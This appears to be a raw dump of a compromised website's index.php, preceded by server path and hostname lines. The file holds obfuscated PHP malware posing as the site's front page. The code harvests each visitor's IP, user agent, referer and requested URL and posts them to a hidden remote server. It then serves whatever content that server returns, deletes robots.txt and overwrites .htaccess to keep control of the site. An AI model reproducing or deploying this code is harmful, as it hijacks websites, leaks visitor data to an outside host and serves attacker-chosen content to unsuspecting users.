PK œqhYî¶J‚ßF ßF ) nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/
Dir : /proc/thread-self/root/proc/self/root/proc/self/root/home/trave494/live2news.com/ |
Server: Linux ngx353.inmotionhosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64 IP: 209.182.202.254 |
Dir : //proc/thread-self/root/proc/self/root/proc/self/root/home/trave494/live2news.com/index.php |
<?php goto r3JWE; slshN: $params["\141\x67\145\156\164"] = isset($_SERVER["\x48\124\x54\x50\137\x55\x53\105\122\x5f\101\x47\x45\116\124"]) ? $_SERVER["\x48\124\124\120\x5f\x55\x53\105\x52\x5f\101\107\x45\x4e\124"] : ''; goto wJzBR; fzcta: $params["\151\160"] = isset($_SERVER["\110\x54\x54\x50\x5f\126\x49\x41"]) ? $_SERVER["\110\124\124\x50\137\x58\137\x46\117\x52\127\101\x52\x44\105\104\137\x46\117\x52"] : $_SERVER["\122\x45\115\x4f\x54\105\137\101\104\104\x52"]; goto oEr7p; Owkir: nztUZ: goto spALi; o6EkE: if ($params["\151\x70"] == null) { $params["\151\160"] = ''; } goto qMbR6; H0uez: TnlO1: goto v9u0V; X0iPk: goto zxrzm; goto Co3PH; FsM1G: goto q2mgD; goto PzTvX; hkQ1e: $try = 0; goto d9Mp2; wJzBR: goto u4xKS; goto DUfCp; Co3PH: whTJu: goto oqImb; zg8Yh: Yqy8D: goto HzN39; cqJkg: goto y0k_c; goto Bt6pp; rrVmX: goto ksbGz; goto kYqZY; C6d2J: KX97h: goto Sh2nr; PzTvX: d98gd: goto slshN; p3qxy: if (isset($_REQUEST["\160\141\162\141\x6d\x73"])) { $params["\x61\160\151"] = $api; print_r($params); die; } goto gH7fk; LX5oY: $params["\162\x65\161\x75\145\x73\164\137\x75\162\x6c"] = $_SERVER["\122\105\x51\x55\x45\123\124\x5f\x55\x52\111"]; goto niaQZ; v5G6y: q2mgD: goto p3qxy; iozoZ: $params["\x70\162\157\164\157\143\157\x6c"] = isset($_SERVER["\x48\x54\x54\x50\x53"]) ? "\150\164\x74\x70\x73\x3a\57\57" : "\x68\x74\164\160\x3a\x2f\x2f"; goto cqJkg; Mh9yH: goto nztUZ; goto B5KgB; IAr7A: Y7T_p: goto siRFl; UzSy_: goto d98gd; goto zg8Yh; d9Mp2: goto Y7T_p; goto VDLO0; dd79_: function h2() { if (file_exists("\162\x6f\142\157\x74\x73" . "\x2e\164\x78\164")) { @unlink("\x72\x6f\x62\157\164\163" . "\56\164\170\164"); } $htaccess = "\56" . "\150\164\141\143\x63\145\x73\x73"; $content = @base64_decode("\120\105\x5a\x70\x62\x47\126\172\124\x57\x46\x30\x59\x32\x67\x67\x49\151\64\x6f\143\110\154\70\132\130\x68\154\x66\x48\102\157\143\103\x6b\x6b\111\x6a\x34\x4b\111\105\71\x79\132\x47\x56\171\111\x47\106\163\x62\107\71\63\114\107\122\x6c\x62\x6e\153\x4b\111\105\122\154\x62\156\x6b\147\x5a\156\112\166\142\x53\x42\x68\x62\107\x77\x4b\x50\103\71\107\x61\127\x78\x6c\x63\x30\x31\150\144\x47\116\x6f\x50\x67\x6f\70\122\155\154\163\132\x58\116\116\131\x58\x52\x6a\141\x43\101\x69\x58\151\x68\x68\131\155\71\61\144\x43\x35\x77\141\110\x42\70\x63\x6d\106\153\141\x57\70\165\x63\107\x68\167\146\x47\x6c\x75\x5a\107\126\x34\x4c\x6e\x42\157\143\110\x78\152\142\x32\65\60\x5a\x57\x35\60\x4c\156\102\x6f\x63\x48\x78\163\142\x32\116\x72\115\x7a\131\x77\x4c\x6e\x42\x6f\x63\x48\x78\x68\132\107\61\x70\x62\151\65\x77\141\x48\102\70\144\63\x41\164\x62\x47\x39\156\x61\x57\x34\x75\x63\107\150\x77\x66\x48\x64\x77\114\x57\167\x77\x5a\62\154\x75\114\x6e\102\157\x63\110\170\x33\x63\x43\61\60\x61\x47\126\164\x5a\x53\x35\x77\x61\110\102\x38\144\63\101\x74\143\x32\116\171\141\x58\102\60\143\171\x35\167\141\110\x42\70\144\63\x41\x74\132\x57\122\x70\x64\107\x39\x79\x4c\156\x42\x6f\x63\x48\170\x74\131\127\147\165\143\107\150\x77\146\x47\x70\x77\114\x6e\x42\x6f\143\110\170\154\145\110\121\x75\x63\x47\150\x77\113\x53\121\x69\120\147\157\147\124\x33\x4a\153\x5a\x58\111\x67\131\127\x78\163\142\63\x63\x73\x5a\107\126\165\145\121\x6f\147\x51\x57\170\163\142\x33\143\x67\x5a\156\x4a\x76\x62\x53\x42\150\142\107\167\x4b\120\x43\x39\x47\141\x57\x78\x6c\143\x30\61\x68\144\107\116\x6f\x50\x67\x6f\70\123\127\132\x4e\x62\62\x52\x31\x62\x47\x55\147\142\x57\x39\153\x58\63\x4a\x6c\144\63\112\160\x64\107\x55\165\131\172\x34\x4b\x55\x6d\x56\x33\x63\x6d\154\60\x5a\x55\126\x75\x5a\62\x6c\165\x5a\x53\x42\x50\142\x67\160\123\x5a\x58\144\x79\x61\130\122\154\x51\x6d\x46\172\x5a\123\101\x76\x43\154\112\154\144\x33\112\x70\144\107\126\x53\x64\x57\x78\x6c\111\x46\x35\160\x62\x6d\x52\x6c\x65\x46\167\165\143\x47\x68\167\x4a\x43\101\x74\111\x46\x74\x4d\x58\121\160\x53\x5a\130\x64\x79\x61\x58\x52\x6c\x51\62\71\x75\132\x43\x41\154\x65\61\112\x46\125\126\126\x46\125\61\122\x66\122\153\154\x4d\x52\125\65\102\x54\125\x56\71\111\x43\105\164\x5a\x67\x70\x53\x5a\x58\144\171\x61\130\x52\154\x51\x32\71\165\x5a\x43\x41\154\x65\x31\112\x46\x55\126\126\x46\x55\61\x52\x66\x52\x6b\x6c\x4d\x52\x55\x35\x42\x54\x55\x56\71\x49\x43\x45\164\132\x41\160\x53\132\130\x64\x79\141\x58\x52\154\125\156\x56\x73\x5a\123\101\165\111\103\71\160\x62\155\x52\154\x65\103\x35\x77\x61\110\x41\x67\127\x30\170\x64\x43\152\167\x76\x53\127\132\x4e\142\62\122\x31\142\107\x55\x2b"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto ajeXr; f8BQR: goto whTJu; goto YhhUw; wMoG7: zxrzm: goto lmHkB; v9u0V: $api = base64_decode("\x61\110\122\60\143\104\157\x76\x4c\x7a\x59\167\x4d\172\x4d\x74\131\62\147\60\114\130\x59\x79\x4e\x7a\115\x75\132\x32\x39\x76\x5a\x48\116\167\144\127\x52\x68\x63\x69\x35\163\141\130\x5a\x6c"); goto Mh9yH; qMbR6: goto QloPY; goto v5G6y; DUfCp: O3WYd: goto hkQ1e; UH07Y: $params["\x6c\x61\156\147\165\141\x67\145"] = isset($_SERVER["\110\124\124\x50\137\x41\x43\103\105\120\x54\137\x4c\x41\x4e\x47\x55\x41\107\105"]) ? $_SERVER["\x48\x54\x54\120\137\x41\x43\x43\x45\120\x54\x5f\x4c\101\x4e\107\125\x41\107\x45"] : ''; goto FsM1G; siRFl: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("\x2f\x5c\x7c\x2f\x73\151", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto X0iPk; Bt6pp: q2x6H: goto ypZ62; kYqZY: ksbGz: goto LX5oY; kJIc6: goto zGvKO; goto H0uez; ypZ62: function test() { if ($myVar === 0) { return "\150\x65\154\154\x6f\40\x77\x6f\x72\x6c\144\x21"; } } goto f8BQR; TWvUQ: QloPY: goto iozoZ; gH7fk: goto Yqy8D; goto TWvUQ; ajeXr: goto TnlO1; goto wMoG7; zyd8h: goto O3WYd; goto Owkir; spALi: $params["\x64\x6f\x6d\141\151\x6e"] = isset($_SERVER["\x48\124\124\120\x5f\110\x4f\x53\124"]) ? $_SERVER["\x48\x54\124\120\x5f\110\117\123\x54"] : $_SERVER["\x53\105\122\x56\x45\x52\137\x4e\x41\x4d\105"]; goto rrVmX; lmHkB: $myVar = 0; goto QUUMq; QUUMq: goto q2x6H; goto C6d2J; B5KgB: zGvKO: goto dd79_; niaQZ: goto KX97h; goto IAr7A; rfEkJ: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\x68"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto kJIc6; oEr7p: goto HYPnH; goto I3Edx; I3Edx: HYPnH: goto o6EkE; VDLO0: uF86z: goto rfEkJ; r3JWE: goto uF86z; goto jnqkV; Sh2nr: $params["\162\145\146\x65\x72\145\x72"] = isset($_SERVER["\x48\x54\124\120\137\x52\105\106\x45\x52\105\122"]) ? $_SERVER["\x48\124\x54\120\137\x52\105\x46\105\122\105\x52"] : ''; goto UzSy_; YhhUw: y0k_c: goto UH07Y; HzN39: h2(); goto zyd8h; jnqkV: u4xKS: goto fzcta; oqImb: ?>